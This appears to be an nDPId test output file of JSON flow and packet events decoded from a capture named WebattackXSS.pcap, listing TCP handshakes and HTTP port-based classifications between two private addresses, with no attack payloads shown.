+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1499348015250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348015250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SaJAAD4GfC6sEAABwKgKMokCAFA1NK9QAAAAAKACchAI\/gAAAgQFtAQCCAoBPObyAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":2,"flow_last_seen":1499348015250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348015250,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiQJJKiEWNTSvUaAScSDjTwAAAgQFtAQCCAoD5rhmATzm8gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":3,"flow_last_seen":1499348015251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348015251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SaNAAD4GfDWsEAABwKgKMokCAFA1NK9RSSohF4AQAOWCVwAAAQEICgE85vID5rhm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348016526,"flow_last_seen":1499348016526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348016526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1499348016526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348016526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82X9AAD4G7FCsEAABwKgKMokQAFAj2zFPAAAAAKACchCXDAAAAgQFtAQCCAoBPOgwAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":2,"flow_last_seen":1499348016526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348016526,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiRBmO\/1xI9sxUKAScSB2swAAAgQFtAQCCAoD5rmkATzoMAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":3,"flow_last_seen":1499348016526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348016526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02YBAAD4G7FesEAABwKgKMokQAFAj2zFQZjv9coAQAOUVugAAAQEICgE86DED5rmk"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348019059,"flow_last_seen":1499348019059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019059,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1499348019059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348019059,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bDdAAD4GWZmsEAABwKgKMokqAFBENIadAAAAAKACchAe0QAAAgQFtAQCCAoBPOqqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":2,"flow_last_seen":1499348019059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348019059,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiSoKVvNnRDSGnqAScSBh7QAAAgQFtAQCCAoD5rweATzqqgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":3,"flow_last_seen":1499348019059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348019059,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bDhAAD4GWaCsEAABwKgKMokqAFBENIaeClbzaIAQAOUA9QAAAQEICgE86qoD5rwe"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347886296,"flow_last_seen":1499347891872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347886296,"flow_last_seen":1499347891872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347887572,"flow_last_seen":1499347892872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347887572,"flow_last_seen":1499347892872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347890192,"flow_last_seen":1499347895873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347890192,"flow_last_seen":1499347895873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347891536,"flow_last_seen":1499347896874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347891536,"flow_last_seen":1499347896874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348020357,"flow_last_seen":1499348020357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348020357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1499348020357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348020357,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MF5AAD4GlXKsEAABwKgKMok4AFAr8NuwAAAAAKACchDgrwAAAgQFtAQCCAoBPOvuAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":2,"flow_last_seen":1499348020357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348020357,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiTgvWFvMK\/DbsaAScSCVIQAAAgQFtAQCCAoD5r1iATzr7gEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":3,"flow_last_seen":1499348020358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348020358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MF9AAD4GlXmsEAABwKgKMok4AFAr8NuxL1hbzYAQAOU0KQAAAQEICgE86+4D5r1i"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348021660,"flow_last_seen":1499348021660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348021660,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1499348021660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348021660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8T85AAD4GdgKsEAABwKgKMolGAFAJiKL6AAAAAKACchA6egAAAgQFtAQCCAoBPO00AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8739,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":2,"flow_last_seen":1499348021660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348021660,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiUb24raMCYii+6AScSDLWgAAAgQFtAQCCAoD5r6oATztNAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":3,"flow_last_seen":1499348021660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348021660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0T89AAD4GdgmsEAABwKgKMolGAFAJiKL79uK2jYAQAOVqYgAAAQEICgE87TQD5r6o"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348024206,"flow_last_seen":1499348024206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348024206,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1499348024206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348024206,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82E1AAD4G7YKsEAABwKgKMolgAFCsqjf8AAAAAKACchD\/vgAAAgQFtAQCCAoBPO+xAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":2,"flow_last_seen":1499348024206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348024206,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiWCF9T2qrKo3\/aAScSB38wAAAgQFtAQCCAoD5sEkATzvsQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8758,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":3,"flow_last_seen":1499348024207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348024207,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02E5AAD4G7YmsEAABwKgKMolgAFCsqjf9hfU9q4AQAOUW+wAAAQEICgE877ED5sEk"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348025497,"flow_last_seen":1499348025497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348025497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1499348025497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348025497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA856FAAD4G3i6sEAABwKgKMoluAFBIkhdSAAAAAKACchCDMQAAAgQFtAQCCAoBPPDzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":2,"flow_last_seen":1499348025497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348025497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiW4WAueQSJIXU6AScSDALwAAAgQFtAQCCAoD5sJnATzw8wEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":3,"flow_last_seen":1499348025497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348025497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA056JAAD4G3jWsEAABwKgKMoluAFBIkhdTFgLnkYAQAOVfNwAAAQEICgE88PMD5sJn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348028117,"flow_last_seen":1499348028117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348028117,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1499348028117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348028117,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80XFAAD4G9F6sEAABwKgKMomIAFDG6SLzAAAAAKACchD2jwAAAgQFtAQCCAoBPPOCAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8791,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":2,"flow_last_seen":1499348028117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348028117,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiYg5g7TNxuki9KAScSBAQQAAAgQFtAQCCAoD5sT2ATzzggEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8792,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":3,"flow_last_seen":1499348028118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348028118,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00XJAAD4G9GWsEAABwKgKMomIAFDG6SL0OYO0zoAQAOXfRwAAAQEICgE884MD5sT2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348029395,"flow_last_seen":1499348029395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029395,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1499348029395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348029395,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DoBAAD4Gt1CsEAABwKgKMomWAFBGnvpCAAAAAKACchCePQAAAgQFtAQCCAoBPPTCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":2,"flow_last_seen":1499348029395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348029395,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiZaKxK9BRp76Q6AScSCa+QAAAgQFtAQCCAoD5sY2ATz0wgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":3,"flow_last_seen":1499348029395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348029395,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DoFAAD4Gt1esEAABwKgKMomWAFBGnvpDisSvQoAQAOU6AQAAAQEICgE89MID5sY2"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347894093,"flow_last_seen":1499347899875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347894093,"flow_last_seen":1499347899875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347895396,"flow_last_seen":1499347900875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
